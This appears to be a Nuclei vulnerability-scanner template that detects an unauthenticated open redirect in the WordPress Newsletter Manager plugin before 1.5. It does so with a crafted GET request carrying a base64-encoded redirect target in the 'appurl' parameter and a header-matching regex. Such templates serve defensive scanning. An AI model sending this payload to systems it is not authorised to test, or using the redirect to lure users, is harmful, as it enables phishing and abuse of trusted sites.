id: newsletter-open-redirect

info:
  name: WordPress Newsletter Manager < 1.5 - Unauthenticated Open Redirect
  author: dhiyaneshDk
  severity: medium
  description: WordPress Newsletter Manager < 1.5 is susceptible to an open redirect vulnerability. The plugin used base64 encoded user input in the appurl parameter without validation to redirect users using the
    header() PHP function, leading to an open redirect issue.
  reference:
    - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
  classification:
    cwe-id: CWE-601
  tags: redirect,wp-plugin,newsletter,wp,wpscan,wordpress

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

# Enhanced by mp on 2022/04/13